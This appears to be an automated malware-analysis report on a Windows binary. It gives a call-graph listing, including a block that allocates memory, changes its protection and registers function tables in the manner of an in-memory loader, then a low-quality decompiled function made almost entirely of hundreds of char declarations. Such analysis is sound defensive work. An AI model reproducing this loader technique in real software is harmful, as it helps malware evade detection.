type_info::_name_internal_method char_traits 17894->17896 17895->17896 17896->17889 17898 7ffc123d14f8 char_traits 17897->17898 17901 7ffc123d1ce0 17898->17901 17900 7ffc123d150a 17900->17686 17902 7ffc123d1d02 type_info::_name_internal_method 17901->17902 17903 7ffc123d1d09 Concurrency::details::ContextBase::GetWorkQueueIdentity 17902->17903 17904 7ffc123d1d3a type_info::_name_internal_method 17902->17904 17905 7ffc123d1df0 type_info::_name_internal_method 49 API calls 17903->17905 17906 7ffc123d2230 _Mtx_guard::~_Mtx_guard 49 API calls 17904->17906 17907 7ffc123d1d65 type_info::_name_internal_method 17904->17907 17909 7ffc123d1d35 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17905->17909 17906->17907 17908 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17907->17908 17907->17909 17908->17909 17909->17900 17911 7ffc123d2ab2 17910->17911 17918 7ffc123d2d40 17911->17918 17915 7ffc123d1f18 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method char_traits 17914->17915 17916 7ffc123d1910 type_info::_name_internal_method 47 API calls 17915->17916 17917 7ffc123d2016 17916->17917 17917->17694 17919 7ffc123d2d6d 17918->17919 17920 7ffc123d2dc1 type_info::_name_internal_method 17919->17920 17921 7ffc123d2d74 type_info::_name_internal_method 17919->17921 17925 7ffc123d2fc0 17920->17925 17922 7ffc123d2450 49 API calls 17921->17922 17923 7ffc123d2af4 17922->17923 17923->17694 17926 7ffc123d2fea type_info::_name_internal_method 17925->17926 17927 7ffc123d2ff1 Concurrency::details::ContextBase::GetWorkQueueIdentity 17926->17927 17928 7ffc123d303c 17926->17928 17936 7ffc123d3240 17927->17936 17929 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17928->17929 17932 7ffc123d304b type_info::_name_internal_method 17929->17932 17931 7ffc123d3037 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17931->17923 17933 7ffc123d2230 _Mtx_guard::~_Mtx_guard 49 API calls 17932->17933 17934 7ffc123d30aa Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17932->17934 17933->17934 17934->17931 17935 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17934->17935 17935->17931 17937 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17936->17937 17938 7ffc123d3270 17937->17938 17939 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17938->17939 17940 7ffc123d3285 type_info::_name_internal_method 17939->17940 17941 7ffc123d2230 _Mtx_guard::~_Mtx_guard 49 API calls 17940->17941 17942 7ffc123d3315 type_info::_name_internal_method 17940->17942 17941->17942 17943 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17942->17943 17944 7ffc123d338e Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17942->17944 17943->17944 17944->17931 17946 7ffc123d91e8 17945->17946 17953 7ffc123d893c 17946->17953 17949 7ffc123d923c 17951 7ffc123d9251 17949->17951 17952 7ffc123d90d0 _invalid_parameter_noinfo_noreturn 47 API calls 17949->17952 17950 7ffc123d90d0 _invalid_parameter_noinfo_noreturn 47 API calls 17950->17949 17951->17641 17952->17951 17954 7ffc123d8947 17953->17954 17955 7ffc123d8975 17954->17955 17956 7ffc123d8987 17954->17956 17957 7ffc123db420 _set_errno_from_matherr 11 API calls 17955->17957 17959 7ffc123d8995 17956->17959 17963 7ffc123d89d1 17956->17963 17958 7ffc123d897a 17957->17958 17971 7ffc123d9744 17958->17971 17960 7ffc123d9674 _invalid_parameter_noinfo_noreturn 47 API calls 17959->17960 17970 7ffc123d8985 17959->17970 17960->17970 17962 7ffc123d8d5d 17964 7ffc123db420 _set_errno_from_matherr 11 API calls 17962->17964 17962->17970 17963->17962 17965 7ffc123db420 _set_errno_from_matherr 11 API calls 17963->17965 17966 7ffc123d8ffd 17964->17966 17967 7ffc123d8d52 17965->17967 17968 7ffc123d9744 _invalid_parameter_noinfo 47 API calls 17966->17968 17969 7ffc123d9744 _invalid_parameter_noinfo 47 API calls 17967->17969 17968->17970 17969->17962 17970->17949 17970->17950 17972 7ffc123d95d8 _invalid_parameter_noinfo_noreturn 47 API calls 17971->17972 17973 7ffc123d975d 17972->17973 17973->17970 17977 7ffc123ea250 17974->17977 17976 7ffc123e9f51 17976->17648 17980 7ffc123eacc0 17977->17980 17979 7ffc123ea261 17979->17976 17983 7ffc123eb560 17980->17983 17982 7ffc123eacd1 17982->17979 17986 7ffc123ebc70 17983->17986 17985 7ffc123eb571 17985->17982 17989 7ffc123ec580 17986->17989 17988 7ffc123ebc81 17988->17985 17992 7ffc123ecf10 17989->17992 17991 7ffc123ec591 17991->17988 17995 7ffc123ed890 17992->17995 17994 7ffc123ecf21 17994->17991 17996 7ffc123ee020 8 API calls 17995->17996 17997 7ffc123ed8a1 17996->17997 17997->17994 18001 7ffc123d3d77 __std_exception_copy 17998->18001 17999 7ffc123d3da2 17999->17659 18000 7ffc123d97ec new 2 API calls 18000->18001 18001->17999 18001->18000 18004 7ffc123d472c 18001->18004 18008 7ffc123d470c 18001->18008 18005 7ffc123d473a std::bad_alloc::bad_alloc 18004->18005 18006 7ffc123d6e00 _CxxThrowException 2 API calls 18005->18006 18007 7ffc123d474b 18006->18007 18007->18001 18009 7ffc123d471a std::bad_alloc::bad_alloc 18008->18009 18010 7ffc123d6e00 _CxxThrowException 2 API calls 18009->18010 18011 7ffc123d472b 18010->18011 18013 7ffc123d3d12 RtlLookupFunctionEntry 18012->18013 18014 7ffc123d3d28 RtlVirtualUnwind 18013->18014 18015 7ffc123d3b2e 18013->18015 18014->18013 18014->18015 18016 7ffc123d3ad0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18015->18016 18017 7ffc123e3f70 18020 7ffc123e9600 18017->18020 18019 7ffc123e3f97 ExitProcess 18021 7ffc123e9758 18020->18021 18021->18019 18022 18000741c 18023 18000745d 18022->18023 18026 1800284b0 18023->18026 18025 1800075fe 18028 180028554 18026->18028 18027 180028653 CreateProcessW 18027->18025 18028->18027 18029 9f0000 18033 9f015a 18029->18033 18030 9f08eb 18031 9f033f GetNativeSystemInfo 18031->18030 18032 9f0377 VirtualAlloc 18031->18032 18034 9f0395 18032->18034 18033->18030 18033->18031 18035 9f0873 18034->18035 18037 9f084b VirtualProtect 18034->18037 18035->18030 18036 9f08c6 RtlAddFunctionTable 18035->18036 18036->18030 18037->18034

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 25%
                                                                                                        			E00007FFC7FFC123E3FB0(intOrPtr __edx, void* __edi, void* __esp, void* __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rsi, long long __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                        				signed int _v24;
                                                                                                        				char _v29;
                                                                                                        				char _v30;
                                                                                                        				char _v31;
                                                                                                        				char _v32;
                                                                                                        				char _v33;
                                                                                                        				char _v34;
                                                                                                        				char _v35;
                                                                                                        				char _v36;
                                                                                                        				char _v37;
                                                                                                        				char _v38;
                                                                                                        				char _v39;
                                                                                                        				char _v40;
                                                                                                        				char _v41;
                                                                                                        				char _v42;
                                                                                                        				char _v43;
                                                                                                        				char _v44;
                                                                                                        				char _v45;
                                                                                                        				char _v46;
                                                                                                        				char _v47;
                                                                                                        				char _v48;
                                                                                                        				char _v49;
                                                                                                        				char _v50;
                                                                                                        				char _v51;
                                                                                                        				char _v52;
                                                                                                        				char _v53;
                                                                                                        				char _v54;
                                                                                                        				char _v55;
                                                                                                        				char _v56;
                                                                                                        				char _v57;
                                                                                                        				char _v58;
                                                                                                        				char _v59;
                                                                                                        				char _v60;
                                                                                                        				char _v61;
                                                                                                        				char _v62;
                                                                                                        				char _v63;
                                                                                                        				char _v64;
                                                                                                        				char _v65;
                                                                                                        				char _v66;
                                                                                                        				char _v67;
                                                                                                        				char _v68;
                                                                                                        				char _v69;
                                                                                                        				char _v70;
                                                                                                        				char _v71;
                                                                                                        				char _v72;
                                                                                                        				char _v73;
                                                                                                        				char _v74;
                                                                                                        				char _v75;
                                                                                                        				char _v76;
                                                                                                        				char _v77;
                                                                                                        				char _v78;
                                                                                                        				char _v79;
                                                                                                        				char _v80;
                                                                                                        				char _v81;
                                                                                                        				char _v82;
                                                                                                        				char _v83;
                                                                                                        				char _v84;
                                                                                                        				char _v85;
                                                                                                        				char _v86;
                                                                                                        				char _v87;
                                                                                                        				char _v88;
                                                                                                        				char _v89;
                                                                                                        				char _v90;
                                                                                                        				char _v91;
                                                                                                        				char _v92;
                                                                                                        				char _v93;
                                                                                                        				char _v94;
                                                                                                        				char _v95;
                                                                                                        				char _v96;
                                                                                                        				char _v97;
                                                                                                        				char _v98;
                                                                                                        				char _v99;
                                                                                                        				char _v100;
                                                                                                        				char _v101;
                                                                                                        				char _v102;
                                                                                                        				char _v103;
                                                                                                        				char _v104;
                                                                                                        				char _v105;
                                                                                                        				char _v106;
                                                                                                        				char _v107;
                                                                                                        				char _v108;
                                                                                                        				char _v109;
                                                                                                        				char _v110;
                                                                                                        				char _v111;
                                                                                                        				char _v112;
                                                                                                        				char _v113;
                                                                                                        				char _v114;
                                                                                                        				char _v115;
                                                                                                        				char _v116;
                                                                                                        				char _v117;
                                                                                                        				char _v118;
                                                                                                        				char _v119;
                                                                                                        				char _v120;
                                                                                                        				char _v121;
                                                                                                        				char _v122;
                                                                                                        				char _v123;
                                                                                                        				char _v124;
                                                                                                        				char _v125;
                                                                                                        				char _v126;
                                                                                                        				char _v127;
                                                                                                        				char _v128;
                                                                                                        				char _v129;
                                                                                                        				char _v130;
                                                                                                        				char _v131;
                                                                                                        				char _v132;
                                                                                                        				char _v133;
                                                                                                        				char _v134;
                                                                                                        				char _v135;
                                                                                                        				char _v136;
                                                                                                        				char _v137;
                                                                                                        				char _v138;
                                                                                                        				char _v139;
                                                                                                        				char _v140;
                                                                                                        				char _v141;
                                                                                                        				char _v142;
                                                                                                        				char _v143;
                                                                                                        				char _v144;
                                                                                                        				char _v145;
                                                                                                        				char _v146;
                                                                                                        				char _v147;
                                                                                                        				char _v148;
                                                                                                        				char _v149;
                                                                                                        				char _v150;
                                                                                                        				char _v151;
                                                                                                        				char _v152;
                                                                                                        				char _v153;
                                                                                                        				char _v154;
                                                                                                        				char _v155;
                                                                                                        				char _v156;
                                                                                                        				char _v157;
                                                                                                        				char _v158;
                                                                                                        				char _v159;
                                                                                                        				char _v160;
                                                                                                        				char _v161;
                                                                                                        				char _v162;
                                                                                                        				char _v163;
                                                                                                        				char _v164;
                                                                                                        				char _v165;
                                                                                                        				char _v166;
                                                                                                        				char _v167;
                                                                                                        				char _v168;
                                                                                                        				char _v169;
                                                                                                        				char _v170;
                                                                                                        				char _v171;
                                                                                                        				char _v172;
                                                                                                        				char _v173;
                                                                                                        				char _v174;
                                                                                                        				char _v175;
                                                                                                        				char _v176;
                                                                                                        				char _v177;
                                                                                                        				char _v178;
                                                                                                        				char _v179;
                                                                                                        				char _v180;
                                                                                                        				char _v181;
                                                                                                        				char _v182;
                                                                                                        				char _v183;
                                                                                                        				char _v184;
                                                                                                        				char _v185;
                                                                                                        				char _v186;
                                                                                                        				char _v187;
                                                                                                        				char _v188;
                                                                                                        				char _v189;
                                                                                                        				char _v190;
                                                                                                        				char _v191;
                                                                                                        				char _v192;
                                                                                                        				char _v193;
                                                                                                        				char _v194;
                                                                                                        				char _v195;
                                                                                                        				char _v196;
                                                                                                        				char _v197;
                                                                                                        				char _v198;
                                                                                                        				char _v199;
                                                                                                        				char _v200;
                                                                                                        				char _v201;
                                                                                                        				char _v202;
                                                                                                        				char _v203;
                                                                                                        				char _v204;
                                                                                                        				char _v205;
                                                                                                        				char _v206;
                                                                                                        				char _v207;
                                                                                                        				char _v208;
                                                                                                        				char _v209;
                                                                                                        				char _v210;
                                                                                                        				char _v211;
                                                                                                        				char _v212;
                                                                                                        				char _v213;
                                                                                                        				char _v214;
                                                                                                        				char _v215;
                                                                                                        				char _v216;
                                                                                                        				char _v217;
                                                                                                        				char _v218;
                                                                                                        				char _v219;
                                                                                                        				char _v220;
                                                                                                        				char _v221;
                                                                                                        				char _v222;
                                                                                                        				char _v223;
                                                                                                        				char _v224;
                                                                                                        				char _v225;
                                                                                                        				char _v226;
                                                                                                        				char _v227;
                                                                                                        				char _v228;
                                                                                                        				char _v229;
                                                                                                        				char _v230;
                                                                                                        				char _v231;
                                                                                                        				char _v232;
                                                                                                        				char _v233;
                                                                                                        				char _v234;
                                                                                                        				char _v235;
                                                                                                        				char _v236;
                                                                                                        				char _v237;
                                                                                                        				char _v238;
                                                                                                        				char _v239;
                                                                                                        				char _v240;
                                                                                                        				char _v241;
                                                                                                        				char _v242;
                                                                                                        				char _v243;
                                                                                                        				char _v244;
                                                                                                        				char _v245;
                                                                                                        				char _v246;
                                                                                                        				char _v247;
                                                                                                        				char _v248;
                                                                                                        				char _v249;
                                                                                                        				char _v250;
                                                                                                        				char _v251;
                                                                                                        				char _v252;
                                                                                                        				char _v253;
                                                                                                        				char _v254;
                                                                                                        				char _v255;
                                                                                                        				char _v256;
                                                                                                        				char _v257;
                                                                                                        				char _v258;
                                                                                                        				char _v259;
                                                                                                        				char _v260;
                                                                                                        				char _v261;
                                                                                                        				char _v262;
                                                                                                        				char _v263;
                                                                                                        				char _v264;
                                                                                                        				char _v265;
                                                                                                        				char _v266;
                                                                                                        				char _v267;
                                                                                                        				char _v268;
                                                                                                        				char _v269;
                                                                                                        				char _v270;
                                                                                                        				char _v271;
                                                                                                        				char _v272;
                                                                                                        				char _v273;
                                                                                                        				char _v274;
                                                                                                        				char _v275;
                                                                                                        				char _v276;
                                                                                                        				char _v277;
                                                                                                        				char _v278;
                                                                                                        				char _v279;
                                                                                                        				char _v280;
                                                                                                        				char _v281;
                                                                                                        				char _v282;
                                                                                                        				char _v283;
                                                                                                        				char _v284;
                                                                                                        				char _v285;
                                                                                                        				char _v286;
                                                                                                        				char _v287;
                                                                                                        				char _v288;
                                                                                                        				char _v289;
                                                                                                        				char _v290;
                                                                                                        				char _v291;
                                                                                                        				char _v292;
                                                                                                        				char _v293;
                                                                                                        				char _v294;
                                                                                                        				char _v295;
                                                                                                        				char _v296;
                                                                                                        				char _v297;
                                                                                                        				char _v298;
                                                                                                        				char _v299;
                                                                                                        				char _v300;
                                                                                                        				char _v301;
                                                                                                        				char _v302;
                                                                                                        				char _v303;
                                                                                                        				char _v304;
                                                                                                        				char _v305;
                                                                                                        				char _v306;
                                                                                                        				char _v307;
                                                                                                        				char _v308;
                                                                                                        				char _v309;
                                                                                                        				char _v310;
                                                                                                        				char _v311;
                                                                                                        				char _v312;
                                                                                                        				char _v313;
                                                                                                        				char _v314;
                                                                                                        				char _v315;
                                                                                                        				char _v316;
                                                                                                        				char _v317;
                                                                                                        				char _v318;
                                                                                                        				char _v319;
                                                                                                        				char _v320;
                                                                                                        				char _v321;
                                                                                                        				char _v322;
                                                                                                        				char _v323;
                                                                                                        				char _v324;
                                                                                                        				char _v325;
                                                                                                        				char _v326;
                                                                                                        				char _v327;
                                                                                                        				char _v328;
                                                                                                        				char _v329;
                                                                                                        				char _v330;
                                                                                                        				char _v331;
                                                                                                        				char _v332;
                                                                                                        				char _v333;
                                                                                                        				char _v334;
                                                                                                        				char _v335;
                                                                                                        				char _v336;
                                                                                                        				char _v337;
                                                                                                        				char _v338;
                                                                                                        				char _v339;
                                                                                                        				char _v340;
                                                                                                        				char _v341;
                                                                                                        				char _v342;
                                                                                                        				char _v343;
                                                                                                        				char _v344;
                                                                                                        				char _v345;
                                                                                                        				char _v346;
                                                                                                        				char _v347;
                                                                                                        				char _v348;
                                                                                                        				char _v349;
                                                                                                        				char _v350;
                                                                                                        				char _v351;
                                                                                                        				char _v352;
                                                                                                        				char _v353;
                                                                                                        				char _v354;
                                                                                                        				char _v355;
                                                                                                        				char _v356;
                                                                                                        				char _v357;
                                                                                                        				char _v358;
                                                                                                        				char _v359;
                                                                                                        				char _v360;
                                                                                                        				char _v361;
                                                                                                        				char _v362;
                                                                                                        				char _v363;
                                                                                                        				char _v364;
                                                                                                        				char _v365;
                                                                                                        				char _v366;
                                                                                                        				char _v367;
                                                                                                        				char _v368;
                                                                                                        				char _v369;
                                                                                                        				char _v370;
                                                                                                        				char _v371;
                                                                                                        				char _v372;
                                                                                                        				char _v373;
                                                                                                        				char _v374;
                                                                                                        				char _v375;
                                                                                                        				char _v376;
                                                                                                        				char _v377;
                                                                                                        				char _v378;
                                                                                                        				char _v379;
                                                                                                        				char _v380;
                                                                                                        				char _v381;
                                                                                                        				char _v382;
                                                                                                        				char _v383;
                                                                                                        				char _v384;
                                                                                                        				char _v385;
                                                                                                        				char _v386;
                                                                                                        				char _v387;
                                                                                                        				char _v388;
                                                                                                        				char _v389;
                                                                                                        				char _v390;
                                                                                                        				char _v391;
                                                                                                        				char _v392;
                                                                                                        				char _v393;
                                                                                                        				char _v394;
                                                                                                        				char _v395;
                                                                                                        				char _v396;
                                                                                                        				char _v397;
                                                                                                        				char _v398;
                                                                                                        				char _v399;
                                                                                                        				char _v400;
                                                                                                        				char _v401;
                                                                                                        				char _v402;
                                                                                                        				char _v403;
                                                                                                        				char _v404;
                                                                                                        				char _v405;
                                                                                                        				char _v406;
                                                                                                        				char _v407;
                                                                                                        				char _v408;
                                                                                                        				char _v409;
                                                                                                        				char _v410;
                                                                                                        				char _v411;
                                                                                                        				char _v412;
                                                                                                        				char _v413;
                                                                                                        				char _v414;
                                                                                                        				char _v415;
                                                                                                        				char _v416;
                                                                                                        				char _v417;
                                                                                                        				char _v418;
                                                                                                        				char _v419;
                                                                                                        				char _v420;
                                                                                                        				char _v421;
                                                                                                        				char _v422;
                                                                                                        				char _v423;
                                                                                                        				char _v424;
                                                                                                        				char _v425;
                                                                                                        				char _v426;
                                                                                                        				char _v427;
                                                                                                        				char _v428;
                                                                                                        				char _v429;
                                                                                                        				char _v430;
                                                                                                        				char _v431;
                                                                                                        				char _v432;
                                                                                                        				char _v433;
                                                                                                        				char _v434;
                                                                                                        				char _v435;
                                                                                                        				char _v436;
                                                                                                        				char _v437;
                                                                                                        				char _v438;
                                                                                                        				char _v439;
                                                                                                        				char _v440;
                                                                                                        				char _v441;
                                                                                                        				char _v442;
                                                                                                        				char _v443;
                                                                                                        				char _v444;
                                                                                                        				char _v445;
                                                                                                        				char _v446;
                                                                                                        				char _v447;
                                                                                                        				char _v448;
                                                                                                        				char _v449;
                                                                                                        				char _v450;
                                                                                                        				char _v451;
                                                                                                        				char _v452;
                                                                                                        				char _v453;
                                                                                                        				char _v454;
                                                                                                        				char _v455;
                                                                                                        				char _v456;
                                                                                                        				char _v457;
                                                                                                        				char _v458;
                                                                                                        				char _v459;
                                                                                                        				char _v460;
                                                                                                        				char _v461;
                                                                                                        				char _v462;
                                                                                                        				char _v463;
                                                                                                        				char _v464;
                                                                                                        				char _v465;
                                                                                                        				char _v466;
                                                                                                        				char _v467;
                                                                                                        				char _v468;
                                                                                                        				char _v469;
                                                                                                        				char _v470;
                                                                                                        				char _v471;
                                                                                                        				char _v472;
                                                                                                        				char _v473;
                                                                                                        				char _v474;
                                                                                                        				char _v475;
                                                                                                        				char _v476;
                                                                                                        				char _v477;
                                                                                                        				char _v478;
                                                                                                        				char _v479;
                                                                                                        				char _v480;
                                                                                                        				char _v481;
                                                                                                        				char _v482;
                                                                                                        				char _v483;
                                                                                                        				char _v484;
                                                                                                        				char _v485;
                                                                                                        				char _v486;
                                                                                                        				char _v487;
                                                                                                        				char _v488;
                                                                                                        				char _v489;
                                                                                                        				char _v490;
                                                                                                        				char _v491;
                                                                                                        				char _v492;
                                                                                                        				char _v493;
                                                                                                        				char _v494;
                                                                                                        				char _v495;
                                                                                                        				char _v496;
                                                                                                        				char _v497;
                                                                                                        				char _v498;
                                                                                                        				char _v499;
                                                                                                        				char _v500;
                                                                                                        				char _v501;
                                                                                                        				char _v502;
                                                                                                        				char _v503;
                                                                                                        				char _v504;
                                                                                                        				char _v505;
                                                                                                        				char _v506;
                                                                                                        				char _v507;
                                                                                                        				char _v508;
                                                                                                        				char _v509;
                                                                                                        				char _v510;
                                                                                                        				char _v511;
                                                                                                        				char _v512;
                                                                                                        				char _v513;
                                                                                                        				char _v514;
                                                                                                        				char _v515;
                                                                                                        				char _v516;
                                                                                                        				char _v517;
                                                                                                        				char _v518;
                                                                                                        				char _v519;
                                                                                                        				char _v520;
                                                                                                        				char _v521;
                                                                                                        				char _v522;
                                                                                                        				char _v523;
                                                                                                        				char _v524;
                                                                                                        				char _v525;
                                                                                                        				char _v526;
                                                                                                        				char _v527;
                                                                                                        				char _v528;
                                                                                                        				char _v529;
                                                                                                        				char _v530;
                                                                                                        				char _v531;
                                                                                                        				char _v532;
                                                                                                        				char _v533;
                                                                                                        				char _v534;
                                                                                                        				char _v535;
                                                                                                        				char _v536;
                                                                                                        				char _v537;
                                                                                                        				char _v538;
                                                                                                        				char _v539;
                                                                                                        				char _v540;
                                                                                                        				char _v541;
                                                                                                        				char _v542;
                                                                                                        				char _v543;
                                                                                                        				char _v544;
                                                                                                        				char _v545;
                                                                                                        				char _v546;
                                                                                                        				char _v547;
                                                                                                        				char _v548;
                                                                                                        				char _v549;
                                                                                                        				char _v550;
                                                                                                        				char _v551;
                                                                                                        				char _v552;
                                                                                                        				char _v553;
                                                                                                        				char _v554;
                                                                                                        				char _v555;
                                                                                                        				char _v556;
                                                                                                        				char _v557;
                                                                                                        				char _v558;
                                                                                                        				char _v559;
                                                                                                        				char _v560;
                                                                                                        				char _v561;
                                                                                                        				char _v562;
                                                                                                        				char _v563;
                                                                                                        				char _v564;
                                                                                                        				char _v565;
                                                                                                        				char _v566;
                                                                                                        				char _v567;
                                                                                                        				char _v568;
                                                                                                        				char _v569;
                                                                                                        				char _v570;
                                                                                                        				char _v571;
                                                                                                        				char _v572;
                                                                                                        				char _v573;
                                                                                                        				char _v574;
                                                                                                        				char _v575;
                                                                                                        				char _v576;
                                                                                                        				char _v577;
                                                                                                        				char _v578;
                                                                                                        				char _v579;
                                                                                                        				char _v580;
                                                                                                        				char _v581;
                                                                                                        				char _v582;
                                                                                                        				char _v583;
                                                                                                        				char _v584;
                                                                                                        				char _v585;
                                                                                                        				char _v586;
                                                                                                        				char _v587;
                                                                                                        				char _v588;
                                                                                                        				char _v589;
                                                                                                        				char _v590;
                                                                                                        				char _v591;
                                                                                                        				char _v592;
                                                                                                        				char _v593;
                                                                                                        				char _v594;
                                                                                                        				char _v595;
                                                                                                        				char _v596;
                                                                                                        				char _v597;
                                                                                                        				char _v598;
                                                                                                        				char _v599;
                                                                                                        				char _v600;
                                                                                                        				char _v601;
                                                                                                        				char _v602;
                                                                                                        				char _v603;
                                                                                                        				char _v604;
                                                                                                        				char _v605;
                                                                                                        				char _v606;
                                                                                                        				char _v607;
                                                                                                        				char _v608;
                                                                                                        				char _v609;
                                                                                                        				char _v610;
                                                                                                        				char _v611;
                                                                                                        				char _v612;
                                                                                                        				char _v613;
                                                                                                        				char _v614;
                                                                                                        				char _v615;
                                                                                                        				char _v616;
                                                                                                        				char _v617;
                                                                                                        				char _v618;
                                                                                                        				char _v619;
                                                                                                        				char _v620;
                                                                                                        				char _v621;
                                                                                                        				char _v622;
                                                                                                        				char _v623;
                                                                                                        				char _v624;
                                                                                                        				char _v625;
                                                                                                        				char _v626;
                                                                                                        				char _v627;
                                                                                                        				char _v628;
                                                                                                        				char _v629;
                                                                                                        				char _v630;
                                                                                                        				char _v631;
                                                                                                        				char _v632;
                                                                                                        				char _v633;
                                                                                                        				char _v634;
                                                                                                        				char _v635;
                                                                                                        				char _v636;
                                                                                                        				char _v637;
                                                                                                        				char _v638;
                                                                                                        				char _v639;
                                                                                                        				char _v640;
                                                                                                        				char _v641;
                                                                                                        				char _v642;
                                                                                                        				char _v643;
                                                                                                        				char _v644;
                                                                                                        				char _v645;
                                                                                                        				char _v646;
                                                                                                        				char _v647;
                                                                                                        				char _v648;
                                                                                                        				char _v649;
                                                                                                        				char _v650;
                                                                                                        				char _v651;
                                                                                                        				char _v652;
                                                                                                        				char _v653;
                                                                                                        				char _v654;
                                                                                                        				char _v655;
                                                                                                        				char _v656;
                                                                                                        				char _v657;
                                                                                                        				char _v658;
                                                                                                        				char _v659;
                                                                                                        				char _v660;
                                                                                                        				char _v661;
                                                                                                        				char _v662;
                                                                                                        				char _v663;
                                                                                                        				char _v664;
                                                                                                        				char _v665;
                                                                                                        				char _v666;
                                                                                                        				char _v667;
                                                                                                        				char _v668;
                                                                                                        				char _v669;
                                                                                                        				char _v670;
                                                                                                        				char _v671;
                                                                                                        				char _v672;
                                                                                                        				char _v673;
                                                                                                        				char _v674;
                                                                                                        				char _v675;
                                                                                                        				char _v676;
                                                                                                        				char _v677;
                                                                                                        				char _v678;
                                                                                                        				char _v679;
                                                                                                        				char _v680;
                                                                                                        				char _v681;
                                                                                                        				char _v682;
                                                                                                        				char _v683;
                                                                                                        				char _v684;
                                                                                                        				char _v685;
                                                                                                        				char _v686;
                                                                                                        				char _v687;
                                                                                                        				char _v688;
                                                                                                        				char _v689;
                                                                                                        				char _v690;
                                                                                                        				char _v691;
                                                                                                        				char _v692;
                                                                                                        				char _v693;
                                                                                                        				char _v694;
                                                                                                        				char _v695;
                                                                                                        				char _v696;
                                                                                                        				char _v697;
                                                                                                        				char _v698;
                                                                                                        				char _v699;
                                                                                                        				char _v700;
                                                                                                        				char _v701;
                                                                                                        				char _v702;
                                                                                                        				char _v703;
                                                                                                        				char _v704;
                                                                                                        				char _v705;
                                                                                                        				char _v706;
                                                                                                        				char _v707;
                                                                                                        				char _v708;
                                                                                                        				char _v709;
                                                                                                        				char _v710;
                                                                                                        				char _v711;
                                                                                                        				char _v712;
                                                                                                        				char _v713;
                                                                                                        				char _v714;
                                                                                                        				char _v715;
                                                                                                        				char _v716;
                                                                                                        				char _v717;
                                                                                                        				char _v718;
                                                                                                        				char _v719;
                                                                                                        				char _v720;
                                                                                                        				char _v721;
                                                                                                        				char _v722;
                                                                                                        				char _v723;
                                                                                                        				char _v724;
                                                                                                        				char _v725;
                                                                                                        				char _v726;
                                                                                                        				char _v727;
                                                                                                        				char _v728;
                                                                                                        				char _v729;
                                                                                                        				char _v730;
                                                                                                        				char _v731;
                                                                                                        				char _v732;
                                                                                                        				char _v733;
                                                                                                        				char _v734;
                                                                                                        				char _v735;
                                                                                                        				char _v736;
                                                                                                        				char _v737;
                                                                                                        				char _v738;
                                                                                                        				char _v739;
                                                                                                        				char _v740;
                                                                                                        				char _v741;
                                                                                                        				char _v742;
                                                                                                        				char _v743;
                                                                                                        				char _v744;
                                                                                                        				char _v745;
                                                                                                        				char _v746;
                                                                                                        				char _v747;
                                                                                                        				char _v748;
                                                                                                        				char _v749;
                                                                                                        				char _v750;
                                                                                                        				char _v751;
                                                                                                        				char _v752;
                                                                                                        				char _v753;
                                                                                                        				char _v754;
                                                                                                        				char _v755;
                                                                                                        				char _v756;
                                                                                                        				char _v757;
                                                                                                        				char _v758;
                                                                                                        				char _v759;
                                                                                                        				char _v760;
                                                                                                        				char _v761;
                                                                                                        				char _v762;
                                                                                                        				char _v763;
                                                                                                        				char _v764;
                                                                                                        				char _v765;
                                                                                                        				char _v766;
                                                                                                        				char _v767;
                                                                                                        				char _v768;
                                                                                                        				char _v769;
                                                                                                        				char _v770;
                                                                                                        				char _v771;
                                                                                                        				char _v772;
                                                                                                        				char _v773;
                                                                                                        				char _v774;
                                                                                                        				char _v775;
                                                                                                        				char _v776;
                                                                                                        				char _v777;
                                                                                                        				char _v778;
                                                                                                        				char _v779;
                                                                                                        				char _v780;
                                                                                                        				char _v781;
                                                                                                        				char _v782;
                                                                                                        				char _v783;
                                                                                                        				char _v784;
                                                                                                        				char _v785;
                                                                                                        				char _v786;
                                                                                                        				char _v787;
                                                                                                        				char _v788;
                                                                                                        				char _v789;
                                                                                                        				char _v790;
                                                                                                        				char _v791;
                                                                                                        				char _v792;
                                                                                                        				char _v793;
                                                                                                        				char _v794;
                                                                                                        				char _v795;
                                                                                                        				char _v796;
                                                                                                        				char _v797;
                                                                                                        				char _v798;
                                                                                                        				char _v799;
                                                                                                        				char _v800;
                                                                                                        				char _v801;
                                                                                                        				char _v802;
                                                                                                        				char _v803;
                                                                                                        				char _v804;
                                                                                                        				char _v805;
                                                                                                        				char _v806;
                                                                                                        				char _v807;
                                                                                                        				char _v808;
                                                                                                        				char _v809;
                                                                                                        				char _v810;
                                                                                                        				char _v811;
                                                                                                        				char _v812;
                                                                                                        				char _v813;
                                                                                                        				char _v814;
                                                                                                        				char _v815;
                                                                                                        				char _v816;
                                                                                                        				char _v817;
                                                                                                        				char _v818;
                                                                                                        				char _v819;
                                                                                                        				char _v820;
                                                                                                        				char _v821;
                                                                                                        				char _v822;
                                                                                                        				char _v823;
                                                                                                        				char _v824;
                                                                                                        				char _v825;
                                                                                                        				char _v826;
                                                                                                        				char _v827;
                                                                                                        				char _v828;
                                                                                                        				char _v829;
                                                                                                        				char _v830;
                                                                                                        				char _v831;
                                                                                                        				char _v832;
                                                                                                        				char _v833;
                                                                                                        				char _v834;
                                                                                                        				char _v835;
                                                                                                        				char _v836;
                                                                                                        				char _v837;
                                                                                                        				char _v838;
                                                                                                        				char _v839;
                                                                                                        				char _v840;
                                                                                                        				char _v841;
                                                                                                        				char _v842;
                                                                                                        				char _v843;
                                                                                                        				char _v844;
                                                                                                        				char _v845;
                                                                                                        				char _v846;
                                                                                                        				char _v847;
                                                                                                        				char _v848;
                                                                                                        				char _v849;
                                                                                                        				char _v850;
                                                                                                        				char _v851;
                                                                                                        				char _v852;
                                                                                                        				char _v853;
                                                                                                        				char _v854;
